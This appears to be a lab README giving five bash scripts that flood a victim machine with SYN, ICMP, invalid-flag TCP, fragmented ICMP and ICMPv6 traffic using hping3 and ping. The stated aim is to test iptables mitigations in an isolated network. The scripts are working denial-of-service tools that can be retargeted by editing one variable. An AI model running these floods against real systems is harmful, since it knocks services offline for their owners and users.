Here are the scripts with the attacker's IP addresses (in our case: `192.168.150.128` for IPv4 and `fe80::20c:29ff:fe26:f734` for IPv6, change accordingly) targeting the victim machine (in our case: `192.168.150.133` for IPv4 and `fe80::2bd9:b60a:e8c7:ba6c` for IPv6, change accordingly):

1. SYN Flood Attack

To simulate a SYN flood attack from the attacker (`192.168.150.128`) to the target machine (`192.168.150.133`), we used that script:

bash:
-------------------------------------

#!/bin/bash

# Target IP address
TARGET_IP="192.168.150.133"

# Target port (common HTTP port 80, adjust as needed)
TARGET_PORT="80"

# Number of packets per second
PACKETS_PER_SEC="1000"

# Run the SYN flood attack
sudo hping3 -S -p $TARGET_PORT --flood -i u$PACKETS_PER_SEC $TARGET_IP

-------------------------------------
________________________________________________________

2. ICMP Flood Attack

To send a high volume of ICMP Echo Request packets from the attacker (`192.168.150.128`) to the target machine (`192.168.150.133`), we used that script:

bash:
-------------------------------------

#!/bin/bash

# Target IP address
TARGET_IP="192.168.150.133"

# Interval between packets (in seconds)
INTERVAL="0.002"  # 2 ms, adjust if needed

# Number of pings to send
COUNT="1000"

# Run the ICMP flood attack
ping -i $INTERVAL -c $COUNT -f $TARGET_IP

-------------------------------------
________________________________________________________

3. Invalid Packet Attack

To send TCP packets with invalid flags from the attacker (`192.168.150.128`) to the target machine (`192.168.150.133`), we used that script:

bash:
-------------------------------------

#!/bin/bash

# Target IP address
TARGET_IP="192.168.150.133"

# Target port (you can choose any open port or a specific one you want to test)
TARGET_PORT="80"

# Run the invalid packet attack, by sending TCP packets with an invalid combination of flags (The flags: URG, PUSH, and FIN all set)
sudo hping3 -U -P -F -p $TARGET_PORT --flood $TARGET_IP

-------------------------------------
________________________________________________________

4. Fragmented ICMP Packet Attack

To send fragmented ICMP packets from the attacker (`192.168.150.128`) to the target machine (`192.168.150.133`), we used that script:

bash:
-------------------------------------

#!/bin/bash

# Target IP address
TARGET_IP="192.168.150.133"

# Run the fragmented ICMP packet attack
sudo hping3 -1 --frag -d 1472 --flood $TARGET_IP

-------------------------------------
________________________________________________________

5. IPv6 ICMP Flood Attack

To send a high volume of ICMPv6 Echo Request packets from the attacker (`fe80::20c:29ff:fe26:f734`) to the target machine (`fe80::2bd9:b60a:e8c7:ba6c`), we used that script:

bash:
-------------------------------------

#!/bin/bash

# Target IPv6 address
TARGET_IP="fe80::2bd9:b60a:e8c7:ba6c"

# Interface (replace with the correct network interface, e.g., eth0)
INTERFACE="eth0"

# Interval between packets (in seconds)
INTERVAL="0.002"  # 2 ms, adjust if needed

# Number of pings to send
COUNT="1000"

# Run the ICMPv6 flood attack
ping6 -i $INTERVAL -c $COUNT -f -I $INTERFACE $TARGET_IP
-------------------------------------
________________________________________________________


How to Use These Scripts:

1. Preparation:
   - Save each script as a `.sh` file (e.g., `syn_flood.sh`, `icmp_flood.sh`).
   - Make the scripts executable with `chmod +x script_name.sh`.
   - Ensure `hping3` is installed on your attacker machine.

2. Execution:
   - Run these scripts on the attacker machine (`192.168.150.128`) to target the victim machine (`192.168.150.133` for IPv4 and `fe80::2bd9:b60a:e8c7:ba6c` for IPv6).
   - Observe the victim machine's logs and IPTables counters to verify that the attacks are being mitigated.

3. Testing Environment:
   - Ensure you're performing these tests in a controlled environment, such as a test lab or isolated virtual network.

These scripts should help to simulate DDoS attacks from the attacker machine to the victim machine. We allow using it for educational purposes!!
Hope you will enjoy it, Shaked & Eli.